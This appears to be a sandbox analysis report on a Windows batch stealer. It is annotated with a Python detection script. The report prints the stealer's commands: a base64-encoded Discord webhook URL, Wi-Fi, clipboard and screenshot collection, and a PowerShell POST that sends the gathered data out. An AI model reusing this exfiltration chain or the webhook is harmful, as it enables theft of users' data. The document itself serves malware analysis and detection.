Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
  • submitted
    31-12-2024 10:45

General

  • Target

    ultimate_stealer.bat

  • Size

    1KB

  • MD5

    8b98f150c51dd4d1131853ce39e0404a

  • SHA1

    bc017b390021d8ad234bedfbb081fc0a3614c081

  • SHA256

    63f1a99e5ad0aa15bc12bfe7b20d1e9a9df3752b61ec9dbb0d1bb62fc8cfe6c4

  • SHA512

    a6768852c9501eaf8cd9b81dc35f863757e66d5fb532c8265f7d3ca2239c4f1fe0565ab9f37793af17fdbca642861cb986d4ac260ecb632834047b0cce8e750c

Malware Config

Signatures

  • HawkEye

    HawkEye is a malware kit that has seen continuous development since at least 2013.

  • Hawkeye family
  • Clipboard Data 1 TTPs 1 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Deletes itself 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Runs PowerShell via powershell.exe.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. In this run the only netsh invocation is "netsh wlan show profiles" (PID 2824), a discovery command that lists saved Wi-Fi profiles; no helper DLL registration (netsh add helper) appears in the process tree, so this persistence signature is a netsh usage match rather than evidence that a helper DLL was installed.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\ultimate_stealer.bat"
    1⤵
    • Deletes itself
    • Suspicious use of WriteProcessMemory
    PID:1528
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly9kaXNjb3JkLmNvbS9hcGkvd2ViaG9va3MvMTMxNTMzNTExODk0MDAxNjY0MC9TenlPRnVBcm15WUlPWk9vTkR5X0MzVHpSZlNvVXgzemFzQXN0UFdsNlE3OEs1U082aHprYnF4VFlQelI1a25ia2ozVA==')) > webhook.txt"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2572
    • C:\Windows\system32\systeminfo.exe
      systeminfo
      2⤵
      • Gathers system information
      PID:2364
    • C:\Windows\system32\netsh.exe
      netsh wlan show profiles
      2⤵
      • Event Triggered Execution: Netsh Helper DLL
      • System Network Configuration Discovery: Wi-Fi Discovery
      PID:2824
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c findstr /C:"All User Profile" wifi_profiles.txt
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2264
      • C:\Windows\system32\findstr.exe
        findstr /C:"All User Profile" wifi_profiles.txt
        3⤵
        PID:2664
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      2⤵
      • Clipboard Data
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2968
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.SendKeys]::SendWait('{PRTSC}')"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      PID:2628
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$File = 'data.txt'; $uri = ' ■h'; $body = @{content=(Get-Content -Path $File -Raw)}; Invoke-RestMethod -Uri $uri -Method Post -Body $body"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2200
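The process tree above is the whole stealer in nine command lines: decode a base64 literal into a webhook URL, collect systeminfo, saved Wi-Fi profiles, the clipboard and a screenshot, then POST a file to that URL. The following Python is an added example (not part of the sandbox report or of the sample) of the detection logic a SOC would run over such process-creation records: it decodes every FromBase64String('...') argument to recover the Discord webhook URL as an IoC, tags each command line by behaviour, and gives a verdict per process tree. The event tuples are transcribed from the tree above; the tag names, regexes and the "two collection behaviours plus one exfil indicator" threshold are this example's own choices, not the sandbox's signature definitions.

```python
import base64
import re
from collections import defaultdict

# Constructed sample input, transcribed from the process tree in the report above
# as (pid, parent pid, command line). A real deployment would feed Sysmon Event ID 1
# or Security 4688 records into the same functions.
SAMPLE_EVENTS = [
    (1528, None, r'cmd /c "C:\Users\Admin\AppData\Local\Temp\ultimate_stealer.bat"'),
    (2572, 1528, "powershell -Command \"[System.Text.Encoding]::UTF8.GetString("
                 "[System.Convert]::FromBase64String('aHR0cHM6Ly9kaXNjb3JkLmNvbS9hcGkvd2ViaG9va3MvMTMxNTMzNTExODk0MDAxNjY0MC9TenlPRnVBcm15WUlPWk9vTkR5X0MzVHpSZlNvVXgzemFzQXN0UFdsNlE3OEs1U082aHprYnF4VFlQelI1a25ia2ozVA==')) > webhook.txt\""),
    (2364, 1528, "systeminfo"),
    (2824, 1528, "netsh wlan show profiles"),
    (2264, 1528, r'C:\Windows\system32\cmd.exe /c findstr /C:"All User Profile" wifi_profiles.txt'),
    (2664, 2264, r'findstr /C:"All User Profile" wifi_profiles.txt'),
    (2968, 1528, "powershell Get-Clipboard"),
    (2628, 1528, "powershell -Command \"Add-Type -AssemblyName System.Windows.Forms; "
                 "[System.Windows.Forms.SendKeys]::SendWait('{PRTSC}')\""),
    (2200, 1528, "powershell -Command \"$File = 'data.txt'; $uri = ' ■h'; "
                 "$body = @{content=(Get-Content -Path $File -Raw)}; "
                 "Invoke-RestMethod -Uri $uri -Method Post -Body $body\""),
]

# Behaviour rules keyed by this example's own tag names (not the sandbox's signature
# names). COLLECTION_TAGS gather data; the remaining tags decode or send it.
RULES = {
    "b64_decode":         re.compile(r"FromBase64String\(", re.I),
    "systeminfo":         re.compile(r"\bsysteminfo(?:\.exe)?\b", re.I),
    "wifi_discovery":     re.compile(r"\bnetsh\s+wlan\s+show\s+profiles?\b", re.I),
    "wifi_profile_parse": re.compile(r'findstr\s+/C:"All User Profile"', re.I),
    "clipboard":          re.compile(r"\bGet-Clipboard\b", re.I),
    "screenshot":         re.compile(r"\{PRTSC\}|CopyFromScreen", re.I),
    "http_post":          re.compile(r"Invoke-(?:RestMethod|WebRequest)\b.*-Method\s+Post\b", re.I | re.S),
}
COLLECTION_TAGS = {"systeminfo", "wifi_discovery", "wifi_profile_parse", "clipboard", "screenshot"}
B64_LITERAL = re.compile(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)")
WEBHOOK_URL = re.compile(r"https://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/webhooks/\d+/[\w-]+", re.I)


def decode_b64_literals(cmdline):
    """Decode every FromBase64String('...') argument in a command line to text.
    Invalid base64 or non-UTF-8 payloads are skipped rather than raised, so one
    malformed literal cannot abort the scan."""
    decoded = []
    for literal in B64_LITERAL.findall(cmdline):
        try:
            decoded.append(base64.b64decode(literal, validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue
    return decoded


def tag_cmdline(cmdline):
    """Return the set of behaviour tags a single command line triggers."""
    tags = {tag for tag, rx in RULES.items() if rx.search(cmdline)}
    if any(WEBHOOK_URL.search(text) for text in decode_b64_literals(cmdline)):
        tags.add("webhook_url_decoded")
    return tags


def analyze_tree(events):
    """Aggregate tags per process tree (keyed by root pid) and give a verdict.

    Verdict rule (this example's own heuristic): at least two distinct collection
    behaviours plus either an HTTP POST or a decoded webhook URL under one root."""
    parent = {pid: ppid for pid, ppid, _ in events}

    def root_of(pid):
        while parent.get(pid) in parent:  # walk up only through known pids
            pid = parent[pid]
        return pid

    tags_by_root = defaultdict(set)
    webhooks_by_root = defaultdict(list)
    for pid, _, cmdline in events:
        root = root_of(pid)
        tags_by_root[root] |= tag_cmdline(cmdline)
        for text in decode_b64_literals(cmdline):
            webhooks_by_root[root].extend(m.group(0) for m in WEBHOOK_URL.finditer(text))

    verdicts = {}
    for root, tags in tags_by_root.items():
        exfil = "http_post" in tags or "webhook_url_decoded" in tags
        verdicts[root] = {
            "tags": tags,
            "webhooks": webhooks_by_root[root],
            "stealer": len(tags & COLLECTION_TAGS) >= 2 and exfil,
        }
    return verdicts


if __name__ == "__main__":
    for root, v in analyze_tree(SAMPLE_EVENTS).items():
        print(f"root pid {root}: stealer={v['stealer']} tags={sorted(v['tags'])}")
        for url in v["webhooks"]:
            print("  decoded webhook:", url)
```

Grouping by root pid matters here: no single child is damning on its own (systeminfo, netsh wlan show profiles and Get-Clipboard are all legitimate admin commands), but the combination under one cmd.exe root is. The decoded URL also explains the redacted $uri in PID 2200, which is read back from the webhook.txt dropped by PID 2572.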

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\webhook.txt

      Filesize

      248B (consistent with the 121-character decoded webhook URL written by the PowerShell redirect in its default UTF-16LE encoding: 2-byte BOM + 121 x 2 bytes + 4-byte CRLF = 248)

      MD5

      62660daa7eda586bd806a7ff553ee095

      SHA1

      d90d11b252c9637b7a3d6d04a968f9c7a1a34c50

      SHA256

      ebf5116a4ee0ed7d86dd2523d6063f6ed3b49841432781b940e8db31c7a8694c

      SHA512

      e2a2e77b2b66e5f9200da9ea4db3dfa65c9a8c0724b8c7d9bf1132c18690ba9a8e3e5278a597a3ebc1844c8cd6a1c42e82d4e56b6267f3a639dacf67965b18e2

    • C:\Users\Admin\AppData\Local\Temp\wifi_profiles.txt

      Filesize

      59B

      MD5

      409930721dbce1ee58227d109cca4570

      SHA1

      767f86ffec769d8415f07b4372a108cba1bf7221

      SHA256

      6b6dd8b11f84fb78e3e8cfaa7c5fca569d79402b9fc5861b00960b25607c911e

      SHA512

      4875187fce9545a92df636e384f92dcb403dfe80f3cad4a68e79329a1f42e12e9d04948f2a52b939638481da6d3e3b5f5096fe6dfd674ee53cca7c655ec03f17

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

      Filesize

      7KB

      MD5

      541d80db556341acef83d99692243ece

      SHA1

      7d31fc36cf87f9ce90e63ac362e219ab6a2f6aae

      SHA256

      dbb6059fb63c1b94717928340f8f46df5dd77f951ba4a693a5e822faac827581

      SHA512

      7ec62aa15acc64ea61cae6ac29914787dc60e677f68f838000a604537b577c88bb08024209ce7fbfd9e5d312a8d723706c3b9bb2dc26b49384ac33d9bf59a02c

    • memory/2572-7-0x000007FEF5150000-0x000007FEF5AED000-memory.dmp

      Filesize

      9.6MB

    • memory/2572-9-0x000007FEF5150000-0x000007FEF5AED000-memory.dmp

      Filesize

      9.6MB

    • memory/2572-10-0x000007FEF5150000-0x000007FEF5AED000-memory.dmp

      Filesize

      9.6MB

    • memory/2572-11-0x000007FEF5150000-0x000007FEF5AED000-memory.dmp

      Filesize

      9.6MB

    • memory/2572-13-0x000007FEF5150000-0x000007FEF5AED000-memory.dmp

      Filesize

      9.6MB

    • memory/2572-6-0x0000000001D20000-0x0000000001D28000-memory.dmp

      Filesize

      32KB

    • memory/2572-4-0x000007FEF540E000-0x000007FEF540F000-memory.dmp

      Filesize

      4KB

    • memory/2572-8-0x000007FEF5150000-0x000007FEF5AED000-memory.dmp

      Filesize

      9.6MB

    • memory/2572-5-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

      Filesize

      2.9MB

    • memory/2968-25-0x000000001B580000-0x000000001B862000-memory.dmp

      Filesize

      2.9MB

    • memory/2968-26-0x0000000002070000-0x0000000002078000-memory.dmp

      Filesize

      32KB